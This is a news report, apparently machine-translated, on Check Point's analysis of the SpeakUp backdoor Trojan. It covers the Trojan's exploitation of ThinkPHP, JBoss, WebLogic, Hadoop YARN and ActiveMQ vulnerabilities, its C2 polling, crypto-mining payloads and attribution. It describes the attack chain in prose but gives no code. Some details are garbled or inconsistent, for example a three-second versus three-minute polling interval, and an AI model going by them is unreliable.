Rent SMS numbers and don’t worry about personal data on insecure sites.
LAS VEGAS. A backdoor Trojan called SpeakUp has been discovered that exploits Linux servers that manage more than 90 percent of the first million domains in the United States. It uses a sophisticated package of tricks to infect hosts and spread, which, according to analysts, may indicate that it is ready for a serious attack involving a huge number of infected hosts, possibly around the world.
According to a Check Point study published at CPX360 in Las Vegas, SpeakUp (named after its management and control domain, SpeakUpOmaha [dot] com) is used in a crypto mining campaign that is gaining momentum and targeting more than 70,000 servers around to the world, which can serve as the basis for a very formidable botnet.
SpeakUp targets local servers, as well as cloud machines, such as Amazon Web Services hosting; and it doesn’t stop on Linux: it also has the ability to infect MacOS devices.
Oded Vanunu, Head of Product Vulnerability Research for Check Point, said the attack included all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ, and Red Hat JBoss. And, according to him, since this software can be deployed on virtual servers, all cloud infrastructures are also vulnerable.
The Trojan itself can affect all Linux and MacOS distributions.
Infection routine
The initial vector of infection begins by identifying the recently discovered RCE vulnerability in ThinkPHP (CVE-2018-20062); The code uses command injection methods to load the PHP shell, which maintains and executes the Perl backdoor.
The procedure is pretty confusing: using the GET request, the exploit code is sent to the target server. The resulting loaded PHP wrapper then sends another HTTP request to the target server with a standard deployment function that fetches the ibus payload and saves it. Payload execution is triggered by an additional HTTP request. This runs the Perl script, puts it to sleep for two seconds, and deletes the file to remove any signs of infection.
After registering the victim computer with C2, Check Point analysts found that SpeakUp constantly requested new tasks at a fixed interval every three seconds. C2 can say “no task” - or he can tell him to execute arbitrary code on the local computer, download and execute the file from any remote server, destroy or delete the program, or send updated data.
“The beauty is that the threat is located on any infected server,” Vanunu said. “This means that he can adapt new future vulnerabilities and deploy new code that will try to use new methods in the future. If the subject of the threat decides to introduce several more methods of infection, the number of bots can easily increase. ”
The campaign will also be immediately scaled up, since the subject of the threat will be able to download malware to all infected hosts at the same time.
“Infected hosts check for new commands on the C2 server every three minutes,” Vanunu said.
“A threat actor [may also be able to] sell infected hosts to any threat actor and deploy any type of malware at the highest price,” he added.
Very complicated distribution
SpeakUp also comes with a handy distribution script written in Python; its main functions are administrative panels that use brute force using a predefined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for specific ports on servers that use the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers on the internal and external subnets using a full set of exploits.
SpeakUp distribution code exploits known vulnerabilities in six different Linux distributions for distribution, including the JBoss Enterprise Application Platform security bypass vulnerability (CVE-2012-0874); lack of remote code execution (RCE) of the JBoss Seam Framework (CVE-2010-1871); exploit JBoss AS 3/4/5/6 RCE; RCE Oracle WebLogic wls-wsat Deserialization Component (CVE-2017-10271); Vulnerability in Oracle WebLogic Server Component Oracle Fusion Middleware (CVE-2018-2894); Hadoop YARN ResourceManager command exploit and the RCE file upload vulnerability in Apache ActiveMQ Fileserver (CVE-2016-3088).
“Successful exploitation of one of the vulnerabilities will lead to the deployment of the original ibus script on the operating server,” the Check Point analysis said, adding that it is also capable of infecting Mac computers.
Is there a big threat after infection?
Right now, the observed file downloads that the backdoor throws are simple mono mining scenarios. However, SpeakUp authors have the ability to upload any code to the servers. Check Point analysts claim that mining code can become a kind of beta testing, far ahead of the appearance of malware.
“SpeakUp is currently serving XMRig miners to listen on infected servers,” the study said. According to XMRHunter, about 107 Monero coins are currently stored in wallets.
“SpeakUp's intricate payload and distribution technique is, without a doubt, the job of creating a greater threat,” the analysis said. “It's hard to imagine anyone creating such a complex array of payloads to deploy multiple miners. The threat actor behind this campaign can deploy additional payloads that are potentially more intrusive and offensive at any time. He has the ability to scan the surrounding network of the infected server and distribute malware. ”
SpeakUp has no detections in VirusTotal.
The first victims were in East Asia and Latin America, but researchers believe that Russia and Ukraine can also become a goal, like the whole of Europe. Considering the impressive propagation tactics, the non-existent detection level in VirusTotal and the fact that the threat surface contains servers running the most popular sites on the Internet, SpeakUp may be a very serious problem, the researchers say: “This campaign, although it’s still relatively new, it can turn into something more and potentially more harmful ... ”
Attribution
Although the exact identity of the subject of the threat behind this new attack has not yet been confirmed, it is obvious that this is someone or a group of people with many malicious programs.
“Despite the fact that at present we have found a payload for cryptocurrency mining, the most noticeable aspect is the distribution capabilities demonstrated in the code,” Vanunu said. “Not only was this very confusing, the variety of exploits used could potentially mean that a highly skilled hacker is behind us.”
Check Point researchers were able to associate the SpeakUp author with a possibly Russian-speaking malware developer named Zettabit.
“Although SpeakUp is implemented differently [than another Zettabit code], it has much in common with Zettabit's mastery,” the analysis says.
In terms of what Zettabit associates with this malware, “we read all his posts on the Hack Forums and Github projects, so this avatar definitely knows how to bypass botnets,” Vanunu told Threatpost. “He even released a free sample botnet code for everyone. And during the study, we identified two unique lines that were mentioned and used by Zettabit himself a couple of times in the past. ”